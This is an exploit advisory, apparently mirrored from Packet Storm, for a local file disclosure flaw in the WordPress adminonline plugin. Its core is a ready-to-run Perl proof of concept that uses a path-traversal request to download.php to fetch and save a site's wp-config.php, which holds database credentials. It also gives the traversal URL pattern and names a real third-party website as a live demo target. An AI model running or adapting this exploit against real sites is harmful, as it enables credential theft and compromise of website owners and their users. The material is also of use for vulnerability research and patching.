Lucene search
K

WordPress AdminOnline Local File Disclosure

🗓️ 11 Jun 2014 00:00:00Reported by MedrikType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Wordpress adminonline Plugin Local File Disclosure vulnerability allows downloading target local files using a simple Perl POC

Code
`  
  
GGGGGGGGGGGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB   
GGG::::::::::::G H:::::::H H:::::::H B::::::::::::::::B   
GG:::::::::::::::G H:::::::H H:::::::H B::::::BBBBBB:::::B   
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::B B:::::B  
G:::::G GGGGGG H:::::H H:::::H B::::B B:::::B  
G:::::G H:::::H H:::::H B::::B B:::::B  
G:::::G H::::::HHHHH::::::H B::::BBBBBB:::::B   
G:::::G GGGGGGGGGG H:::::::::::::::::H B:::::::::::::BB   
G:::::G G::::::::G H:::::::::::::::::H B::::BBBBBB:::::B   
G:::::G GGGGG::::G H::::::HHHHH::::::H B::::B B:::::B  
G:::::G G::::G H:::::H H:::::H B::::B B:::::B  
G:::::G G::::G H:::::H H:::::H B::::B B:::::B  
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::BBBBBB::::::B  
GG:::::::::::::::G H:::::::H H:::::::H B:::::::::::::::::B   
GGG::::::GGG:::G H:::::::H H:::::::H B::::::::::::::::B   
GGGGGG GGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB   
  
Grey Hat Boy  
  
  
[+] Title : Wordpress adminonline Plugin Local File Download  
[+] Discovered By : Medrik  
[+] CMS Home-Page : http://wordpress.org  
[+] Found Date : 2014-06-11  
[+] Tested On : Windows  
  
###################################  
  
With this Vulnerability You Can Download Target Local Files .  
  
This is LFD Vulnerability In :  
  
File : Download.php  
Parameter : File  
  
########[ Simple Perl Poc ]########  
  
use LWP::Simple;  
$target = 'your target here';  
$confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';  
$req = get $target.$confPath;  
if ($req =~ /package WordPress/){  
print "\n Downloading Config ...";  
open (CONFIG , ">wp-config.txt");  
print CONFIG $req;  
print "\n $target Config Downloaded To File : Wp-config.txt !\n";  
}  
  
########[ End Perl Code ]########  
  
Vulnerability (Locate) :  
  
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]  
  
Demo :  
  
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php  
  
  
Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo ,   
Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation